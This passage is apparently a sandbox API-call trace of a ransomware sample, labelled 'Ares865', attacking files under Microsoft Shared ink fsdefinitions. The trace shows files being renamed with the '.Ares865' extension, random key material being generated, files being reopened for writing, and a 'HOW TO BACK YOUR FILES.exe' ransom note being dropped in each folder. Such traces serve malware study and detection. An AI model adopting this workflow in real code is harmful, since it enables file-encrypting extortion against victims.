"c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.ares865"), dwFlags=0x1) returned 1 [0076.978] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.978] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=727) returned 1 [0076.978] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.979] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.979] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.981] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.982] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.982] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.983] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.Ares865") returned 81 [0076.983] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.ares865"), dwFlags=0x1) returned 1 [0076.984] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.984] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=38485) returned 1 [0076.984] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.985] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.985] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.989] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.989] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.989] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.990] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.Ares865") returned 84 [0076.990] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.ares865"), dwFlags=0x1) returned 1 [0076.991] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.992] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=209) returned 1 [0076.992] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.992] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.992] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.995] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.996] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.996] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.997] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.Ares865") returned 84 [0076.997] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.ares865"), dwFlags=0x1) returned 1 [0076.997] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.998] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=215) returned 1 [0076.998] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.998] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.998] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.001] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0077.001] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.001] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.002] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.Ares865") returned 86 [0077.002] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.ares865"), dwFlags=0x1) returned 1 [0077.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.003] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=219) returned 1 [0077.003] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0077.004] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.004] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.007] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0077.007] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.007] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.008] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.Ares865") returned 84 [0077.008] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.ares865"), dwFlags=0x1) returned 1 [0077.043] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.043] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=215) returned 1 [0077.049] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0077.050] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.050] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.052] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0077.053] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.053] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.054] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.Ares865") returned 84 [0077.054] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.ares865"), dwFlags=0x1) returned 1 [0077.055] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.055] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=591) returned 1 [0077.055] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0077.056] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.056] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.061] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0077.061] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.061] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.062] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.Ares865") returned 80 [0077.062] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.ares865"), dwFlags=0x1) returned 1 [0077.063] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.063] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=207) returned 1 [0077.063] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0077.064] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.064] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.066] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0077.067] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.067] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.067] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web" [0077.067] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d00a0 | out: hHeap=0x2b0000) returned 1 [0077.067] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0077.067] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web") returned 68 [0077.067] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web" [0077.067] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.068] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.071] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.071] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f70bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f70bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.071] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.071] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.072] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.Ares865") returned 88 [0077.072] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.ares865"), dwFlags=0x1) returned 1 [0077.073] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.074] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1166) returned 1 [0077.074] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0077.074] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.075] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.090] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.090] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.090] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.091] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols" [0077.091] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335388 | out: hHeap=0x2b0000) returned 1 [0077.091] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0077.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned 72 [0077.091] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols" [0077.091] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.091] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.095] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.095] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f757e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f757e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.095] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.096] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.096] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.Ares865") returned 91 [0077.096] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.ares865"), dwFlags=0x1) returned 1 [0077.097] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.097] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=749) returned 1 [0077.106] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.107] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.107] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.109] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.110] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.110] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.110] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.Ares865") returned 94 [0077.111] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.ares865"), dwFlags=0x1) returned 1 [0077.112] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.112] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=749) returned 1 [0077.112] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0077.113] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.113] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.115] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.116] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.116] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.116] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.Ares865") returned 92 [0077.116] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.ares865"), dwFlags=0x1) returned 1 [0077.117] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.117] 